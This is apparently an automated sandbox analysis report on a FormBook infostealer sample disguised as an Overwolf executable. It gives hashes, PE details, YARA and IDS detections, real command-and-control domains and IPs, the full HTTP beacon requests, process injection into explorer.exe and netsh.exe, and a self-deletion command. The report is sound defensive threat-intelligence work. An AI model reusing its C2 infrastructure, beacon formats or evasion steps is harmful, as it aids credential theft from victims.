                                • Report size getting too big, too many NtAllocateVirtualMemory calls found.

                                Simulations

                                Behavior and APIs

                                TimeTypeDescription
                                15:17:02API Interceptor1x Sleep call for process: triage_dropped_file.exe modified

                                Joe Sandbox View / Context

                                IPs

                                No context

                                Domains

                                No context

                                ASNs

                                No context

                                JA3 Fingerprints

                                No context

                                Dropped Files

                                No context

                                Created / dropped Files

                                C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\triage_dropped_file.exe.log

                                Download File
                                Process:C:\Users\user\Desktop\triage_dropped_file.exe
                                File Type:ASCII text, with CRLF line terminators
                                Category:dropped
                                Size (bytes):1216
                                Entropy (8bit):5.355304211458859
                                Encrypted:false
                                SSDEEP:24:MLUE4K5E4Ks2E1qE4qXKDE4KhK3VZ9pKhPKIE4oKFKHKoZAE4Kzr7FE4x84j:MIHK5HKXE1qHiYHKhQnoPtHoxHhAHKzr
                                MD5:FED34146BF2F2FA59DCF8702FCC8232E
                                SHA1:B03BFEA175989D989850CF06FE5E7BBF56EAA00A
                                SHA-256:123BE4E3590609A008E85501243AF5BC53FA0C26C82A92881B8879524F8C0D5C
                                SHA-512:1CC89F2ED1DBD70628FA1DC41A32BA0BFA3E81EAE1A1CF3C5F6A48F2DA0BF1F21A5001B8A18B04043C5B8FE4FBE663068D86AA8C4BD8E17933F75687C3178FF6
                                Malicious:true
                                Reputation:high, very likely benign file
                                Preview:1,"fusion","GAC",0..1,"WinRT","NotApp",1..2,"System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089",0..3,"System, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System\4f0a7eefa3cd3e0ba98b5ebddbbc72e6\System.ni.dll",0..2,"System.Drawing, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a",0..3,"System.Core, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Core\f1d8480152e0da9a60ad49c6d16a3b6d\System.Core.ni.dll",0..3,"System.Configuration, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b03f5f7f11d50a3a","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Configuration\8d67d92724ba494b6c7fd089d6f25b48\System.Configuration.ni.dll",0..3,"System.Xml, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089","C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Xml\b219d4630d26b88041b59c21

                                Static File Info

                                General

                                File type:PE32 executable (GUI) Intel 80386 Mono/.Net assembly, for MS Windows
                                Entropy (8bit):7.8138641927863715
                                TrID:
                                • Win32 Executable (generic) Net Framework (10011505/4) 49.83%
                                • Win32 Executable (generic) a (10002005/4) 49.78%
                                • Generic CIL Executable (.NET, Mono, etc.) (73296/58) 0.36%
                                • Generic Win/DOS Executable (2004/3) 0.01%
                                • DOS Executable Generic (2002/1) 0.01%
                                File name:triage_dropped_file.exe
                                File size:408064
                                MD5:f6eaacd1b39028130602ee0892e67663
                                SHA1:12ba0b4e8c41ececa29814f9b64da351e5509fb0
                                SHA256:1e144fefc15a6a2643674f01b3324e29b5320d45a16a081e8aad8a969712cb9d
                                SHA512:a5705ae52ffde84bbd90d6335f23ffccaccbde9b2e75d2462216662a60cf6a178a6a7f2b318975fd77d05ffc1746c357fc85c717fa2aa20cb480e452e9c5463b
                                SSDEEP:6144:h1hwO+Q45IX8LhyTa4eD9n1jMrOmm/jvXryE/74GoynY5vLyv97SnxQf8YdxvBWR:fLenxeOmm/j2Ub2M8YdByUHIgMv4rS
                                File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......PE..L......a..............0..0...........N... ...`....@.. ....................................@................................

                                File Icon

                                Icon Hash:00828e8e8686b000

                                Static PE Info

                                General

                                Entrypoint:0x464eee
                                Entrypoint Section:.text
                                Digitally signed:false
                                Imagebase:0x400000
                                Subsystem:windows gui
                                Image File Characteristics:32BIT_MACHINE, EXECUTABLE_IMAGE
                                DLL Characteristics:NO_SEH, TERMINAL_SERVER_AWARE, DYNAMIC_BASE, NX_COMPAT
                                Time Stamp:0x61F1E2DB [Thu Jan 27 00:10:03 2022 UTC]
                                TLS Callbacks:
                                CLR (.Net) Version:v4.0.30319
                                OS Version Major:4
                                OS Version Minor:0
                                File Version Major:4
                                File Version Minor:0
                                Subsystem Version Major:4
                                Subsystem Version Minor:0
                                Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744

                                Entrypoint Preview

                                Instruction
                                jmp dword ptr [00402000h]
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al
                                add byte ptr [eax], al

                                Data Directories

                                NameVirtual AddressVirtual Size Is in Section
                                IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IMPORT0x64e9c0x4f.text
                                IMAGE_DIRECTORY_ENTRY_RESOURCE0x660000x5e8.rsrc
                                IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                IMAGE_DIRECTORY_ENTRY_BASERELOC0x680000xc.reloc
                                IMAGE_DIRECTORY_ENTRY_DEBUG0x64d640x1c.text
                                IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_IAT0x20000x8.text
                                IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x20080x48.text
                                IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                Sections

                                NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                .text0x20000x62ef40x63000False0.897399285827data7.82226086578IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_READ
                                .rsrc0x660000x5e80x600False0.427083333333data4.19707782727IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                .reloc0x680000xc0x200False0.044921875data0.101910425663IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

                                Resources

                                NameRVASizeTypeLanguageCountry
                                RT_VERSION0x660900x356data
                                RT_MANIFEST0x663f80x1eaXML 1.0 document, UTF-8 Unicode (with BOM) text, with CRLF line terminators

                                Imports

                                DLLImport
                                mscoree.dll_CorExeMain

                                Version Infos

                                DescriptionData
                                Translation0x0000 0x04b0
                                LegalCopyrightCopyright Overwolf 2021
                                Assembly Version11.0.0.0
                                InternalNameUCOMITypeL.exe
                                FileVersion11.0.0.0
                                CompanyNameOverwolf LTD
                                LegalTrademarks
                                Comments
                                ProductNameOverwolf
                                ProductVersion11.0.0.0
                                FileDescriptionOverwolf
                                OriginalFilenameUCOMITypeL.exe

                                Network Behavior

                                Snort IDS Alerts

                                TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
                                01/28/22-15:18:16.875929TCP2031453ET TROJAN FormBook CnC Checkin (GET)4981180192.168.2.5104.21.22.47
                                01/28/22-15:18:16.875929TCP2031449ET TROJAN FormBook CnC Checkin (GET)4981180192.168.2.5104.21.22.47
                                01/28/22-15:18:16.875929TCP2031412ET TROJAN FormBook CnC Checkin (GET)4981180192.168.2.5104.21.22.47
                                01/28/22-15:19:08.137491TCP2031453ET TROJAN FormBook CnC Checkin (GET)4982080192.168.2.581.17.29.148
                                01/28/22-15:19:08.137491TCP2031449ET TROJAN FormBook CnC Checkin (GET)4982080192.168.2.581.17.29.148
                                01/28/22-15:19:08.137491TCP2031412ET TROJAN FormBook CnC Checkin (GET)4982080192.168.2.581.17.29.148

                                Network Port Distribution

                                TCP Packets

                                TimestampSource PortDest PortSource IPDest IP
                                Jan 28, 2022 15:18:16.858393908 CET4981180192.168.2.5104.21.22.47
                                Jan 28, 2022 15:18:16.875597000 CET8049811104.21.22.47192.168.2.5
                                Jan 28, 2022 15:18:16.875716925 CET4981180192.168.2.5104.21.22.47
                                Jan 28, 2022 15:18:16.875929117 CET4981180192.168.2.5104.21.22.47
                                Jan 28, 2022 15:18:16.892891884 CET8049811104.21.22.47192.168.2.5
                                Jan 28, 2022 15:18:16.932411909 CET8049811104.21.22.47192.168.2.5
                                Jan 28, 2022 15:18:16.932641029 CET4981180192.168.2.5104.21.22.47
                                Jan 28, 2022 15:18:16.932703972 CET8049811104.21.22.47192.168.2.5
                                Jan 28, 2022 15:18:16.932756901 CET4981180192.168.2.5104.21.22.47
                                Jan 28, 2022 15:18:16.949366093 CET8049811104.21.22.47192.168.2.5
                                Jan 28, 2022 15:18:47.885889053 CET4981880192.168.2.5188.114.96.7
                                Jan 28, 2022 15:18:47.903076887 CET8049818188.114.96.7192.168.2.5
                                Jan 28, 2022 15:18:47.903237104 CET4981880192.168.2.5188.114.96.7
                                Jan 28, 2022 15:18:47.903491020 CET4981880192.168.2.5188.114.96.7
                                Jan 28, 2022 15:18:47.920373917 CET8049818188.114.96.7192.168.2.5
                                Jan 28, 2022 15:18:47.942751884 CET8049818188.114.96.7192.168.2.5
                                Jan 28, 2022 15:18:47.942790031 CET8049818188.114.96.7192.168.2.5
                                Jan 28, 2022 15:18:47.942950010 CET4981880192.168.2.5188.114.96.7
                                Jan 28, 2022 15:18:47.943054914 CET4981880192.168.2.5188.114.96.7
                                Jan 28, 2022 15:18:47.959908962 CET8049818188.114.96.7192.168.2.5

                                UDP Packets

                                TimestampSource PortDest PortSource IPDest IP
                                Jan 28, 2022 15:18:16.805891991 CET5479153192.168.2.58.8.8.8
                                Jan 28, 2022 15:18:16.841569901 CET53547918.8.8.8192.168.2.5
                                Jan 28, 2022 15:18:47.860148907 CET6373253192.168.2.58.8.8.8
                                Jan 28, 2022 15:18:47.884793043 CET53637328.8.8.8192.168.2.5
                                Jan 28, 2022 15:19:08.085529089 CET5445053192.168.2.58.8.8.8
                                Jan 28, 2022 15:19:08.116527081 CET53544508.8.8.8192.168.2.5

                                DNS Queries

                                TimestampSource IPDest IPTrans IDOP CodeNameTypeClass
                                Jan 28, 2022 15:18:16.805891991 CET192.168.2.58.8.8.80xc69eStandard query (0)www.inspectdecided.xyzA (IP address)IN (0x0001)
                                Jan 28, 2022 15:18:47.860148907 CET192.168.2.58.8.8.80x15a6Standard query (0)www.fengyat.clubA (IP address)IN (0x0001)
                                Jan 28, 2022 15:19:08.085529089 CET192.168.2.58.8.8.80x900cStandard query (0)www.hstolchsjybyl.comA (IP address)IN (0x0001)

                                DNS Answers

                                TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClass
                                Jan 28, 2022 15:18:16.841569901 CET8.8.8.8192.168.2.50xc69eNo error (0)www.inspectdecided.xyz104.21.22.47A (IP address)IN (0x0001)
                                Jan 28, 2022 15:18:16.841569901 CET8.8.8.8192.168.2.50xc69eNo error (0)www.inspectdecided.xyz172.67.202.238A (IP address)IN (0x0001)
                                Jan 28, 2022 15:18:47.884793043 CET8.8.8.8192.168.2.50x15a6No error (0)www.fengyat.club188.114.96.7A (IP address)IN (0x0001)
                                Jan 28, 2022 15:18:47.884793043 CET8.8.8.8192.168.2.50x15a6No error (0)www.fengyat.club188.114.97.7A (IP address)IN (0x0001)
                                Jan 28, 2022 15:19:08.116527081 CET8.8.8.8192.168.2.50x900cNo error (0)www.hstolchsjybyl.com81.17.29.148A (IP address)IN (0x0001)

                                HTTP Request Dependency Graph

                                • www.inspectdecided.xyz
                                • www.fengyat.club

                                HTTP Packets

                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                0192.168.2.549811104.21.22.4780C:\Windows\explorer.exe
                                TimestampkBytes transferredDirectionData
                                Jan 28, 2022 15:18:16.875929117 CET9817OUTGET /a83r/?v2=5jBLRl1pIZPlY&k2MLx=ZSxafiwoPrw2VCRk9gX3wlOewDINgI1JCq9hgmGWZWQPOxIps9jFRiFeHjLrjNblu9Aw HTTP/1.1
                                Host: www.inspectdecided.xyz
                                Connection: close
                                Data Raw: 00 00 00 00 00 00 00
                                Data Ascii:
                                Jan 28, 2022 15:18:16.932411909 CET9818INHTTP/1.1 301 Moved Permanently
                                Date: Fri, 28 Jan 2022 14:18:16 GMT
                                Transfer-Encoding: chunked
                                Connection: close
                                Cache-Control: max-age=3600
                                Expires: Fri, 28 Jan 2022 15:18:16 GMT
                                Location: https://www.inspectdecided.xyz/a83r/?v2=5jBLRl1pIZPlY&k2MLx=ZSxafiwoPrw2VCRk9gX3wlOewDINgI1JCq9hgmGWZWQPOxIps9jFRiFeHjLrjNblu9Aw
                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=fjqTa6KQsXdQRf6Ui81gv%2FixmDSEV7LuDmOzKiC%2BSgTrMTax57A58RTIGO7bxWx6f3I6LXJ%2Bt9JiP%2BcxtYw5hpNb38GcMN61qi%2BJq29xsG6njKpQu%2B2I3Dnqo94vapExWe%2FSNA0NCk%2Fx"}],"group":"cf-nel","max_age":604800}
                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                Server: cloudflare
                                CF-RAY: 6d4ad95f8af492a8-FRA
                                alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                Data Raw: 30 0d 0a 0d 0a
                                Data Ascii: 0


                                Session IDSource IPSource PortDestination IPDestination PortProcess
                                1192.168.2.549818188.114.96.780C:\Windows\explorer.exe
                                TimestampkBytes transferredDirectionData
                                Jan 28, 2022 15:18:47.903491020 CET9853OUTGET /a83r/?k2MLx=CjCejP19lpOaTsMOx5tDhI8S8yyOisIWAU++//65IFIgHpMHnqLlfGYboARBAcbNtYvQ&v2=5jBLRl1pIZPlY HTTP/1.1
                                Host: www.fengyat.club
                                Connection: close
                                Data Raw: 00 00 00 00 00 00 00
                                Data Ascii:
                                Jan 28, 2022 15:18:47.942751884 CET9854INHTTP/1.1 301 Moved Permanently
                                Date: Fri, 28 Jan 2022 14:18:47 GMT
                                Transfer-Encoding: chunked
                                Connection: close
                                Cache-Control: max-age=3600
                                Expires: Fri, 28 Jan 2022 15:18:47 GMT
                                Location: https://www.fengyat.club/a83r/?k2MLx=CjCejP19lpOaTsMOx5tDhI8S8yyOisIWAU++//65IFIgHpMHnqLlfGYboARBAcbNtYvQ&v2=5jBLRl1pIZPlY
                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=mnoWGeHzpnVaxZkk%2BzzUERWAf6hGdgSOv0fX66e4lwZflgc8bI9nQQ6mHXVu3QTfAKTt77ZML%2Bck4mR9nM3JssBSwJuhoX157rCAbnDtk%2FWS9GMZxv%2FliRve1zQnmmJaKCAP"}],"group":"cf-nel","max_age":604800}
                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                Server: cloudflare
                                CF-RAY: 6d4ada217e8c5c62-FRA
                                alt-svc: h3=":443"; ma=86400, h3-29=":443"; ma=86400
                                Data Raw: 30 0d 0a 0d 0a
                                Data Ascii: 0


                                Statistics

                                Behavior

                                Click to jump to process

                                System Behavior

                                General

                                Target ID:0
                                Start time:15:16:42
                                Start date:28/01/2022
                                Path:C:\Users\user\Desktop\triage_dropped_file.exe
                                Wow64 process (32bit):true
                                Commandline:"C:\Users\user\Desktop\triage_dropped_file.exe"
                                Imagebase:0xea0000
                                File size:408064 bytes
                                MD5 hash:F6EAACD1B39028130602EE0892E67663
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:.Net C# or VB.NET
                                Yara matches:
                                • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.284884958.00000000031F1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.285346164.00000000032A5000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000000.00000002.285937751.00000000041F9000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000000.00000002.285937751.00000000041F9000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000000.00000002.285937751.00000000041F9000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                Reputation:low

                                General

                                Target ID:5
                                Start time:15:17:04
                                Start date:28/01/2022
                                Path:C:\Users\user\Desktop\triage_dropped_file.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Users\user\Desktop\triage_dropped_file.exe
                                Imagebase:0x9a0000
                                File size:408064 bytes
                                MD5 hash:F6EAACD1B39028130602EE0892E67663
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.281504689.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.281504689.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.281504689.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.362800931.0000000001070000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.362800931.0000000001070000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.362800931.0000000001070000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.363071763.00000000013B0000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.363071763.00000000013B0000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.363071763.00000000013B0000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000002.362401143.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000002.362401143.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000002.362401143.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000005.00000000.281804558.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000005.00000000.281804558.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000005.00000000.281804558.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                Reputation:low

                                General

                                Target ID:12
                                Start time:15:17:07
                                Start date:28/01/2022
                                Path:C:\Windows\explorer.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\Explorer.EXE
                                Imagebase:0x7ff693d90000
                                File size:3933184 bytes
                                MD5 hash:AD5296B280E8F522A8A897C96BAB0E1D
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000000.323777196.00000000071DA000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000000.323777196.00000000071DA000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000000.323777196.00000000071DA000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 0000000C.00000000.311237190.00000000071DA000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 0000000C.00000000.311237190.00000000071DA000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 0000000C.00000000.311237190.00000000071DA000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                Reputation:high

                                General

                                Target ID:20
                                Start time:15:17:39
                                Start date:28/01/2022
                                Path:C:\Windows\SysWOW64\autofmt.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\SysWOW64\autofmt.exe
                                Imagebase:0xed0000
                                File size:831488 bytes
                                MD5 hash:7FC345F685C2A58283872D851316ACC4
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:moderate

                                General

                                Target ID:21
                                Start time:15:17:40
                                Start date:28/01/2022
                                Path:C:\Windows\SysWOW64\netsh.exe
                                Wow64 process (32bit):true
                                Commandline:C:\Windows\SysWOW64\netsh.exe
                                Imagebase:0x11f0000
                                File size:82944 bytes
                                MD5 hash:A0AA3322BB46BBFC36AB9DC1DBBBB807
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Yara matches:
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000015.00000002.507022811.0000000000F90000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000015.00000002.507022811.0000000000F90000.00000004.00000800.00020000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000015.00000002.507022811.0000000000F90000.00000004.00000800.00020000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000015.00000002.506874755.0000000000F60000.00000040.10000000.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000015.00000002.506874755.0000000000F60000.00000040.10000000.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000015.00000002.506874755.0000000000F60000.00000040.10000000.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                • Rule: JoeSecurity_FormBook, Description: Yara detected FormBook, Source: 00000015.00000002.505839508.0000000000980000.00000040.00000001.00040000.00000000.sdmp, Author: Joe Security
                                • Rule: Formbook_1, Description: autogenerated rule brought to you by yara-signator, Source: 00000015.00000002.505839508.0000000000980000.00000040.00000001.00040000.00000000.sdmp, Author: Felix Bilstein - yara-signator at cocacoding dot com
                                • Rule: Formbook, Description: detect Formbook in memory, Source: 00000015.00000002.505839508.0000000000980000.00000040.00000001.00040000.00000000.sdmp, Author: JPCERT/CC Incident Response Group
                                Reputation:high

                                General

                                Target ID:22
                                Start time:15:17:44
                                Start date:28/01/2022
                                Path:C:\Windows\SysWOW64\cmd.exe
                                Wow64 process (32bit):true
                                Commandline:/c del "C:\Users\user\Desktop\triage_dropped_file.exe"
                                Imagebase:0x150000
                                File size:232960 bytes
                                MD5 hash:F3BDBE3BB6F734E357235F4D5898582D
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high

                                General

                                Target ID:23
                                Start time:15:17:46
                                Start date:28/01/2022
                                Path:C:\Windows\System32\conhost.exe
                                Wow64 process (32bit):false
                                Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                Imagebase:0x7ff7ecfc0000
                                File size:625664 bytes
                                MD5 hash:EA777DEEA782E8B4D7C7C33BBF8A4496
                                Has elevated privileges:true
                                Has administrator privileges:true
                                Programmed in:C, C++ or other language
                                Reputation:high

                                Disassembly

                                No disassembly